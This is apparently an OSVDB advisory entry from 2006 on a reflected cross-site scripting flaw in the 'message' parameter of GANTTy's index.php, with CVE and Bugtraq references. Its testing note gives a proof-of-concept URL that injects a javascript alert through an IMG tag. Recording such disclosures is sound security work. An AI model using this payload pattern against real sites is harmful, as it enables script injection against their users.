GANTTy index.php message Variable XSS

2006-06-05T09:08:06
ID OSVDB:26208
Type osvdb
Reporter luny(luny@youfucktard.com)
Modified 2006-06-05T09:08:06

Description

Manual Testing Notes

http://[target]/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=

References:

Vendor URL: http://www.gantty.com/ Secunia Advisory ID:20498 Related OSVDB ID: 26209 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0014.html CVE-2006-2892 Bugtraq ID: 18296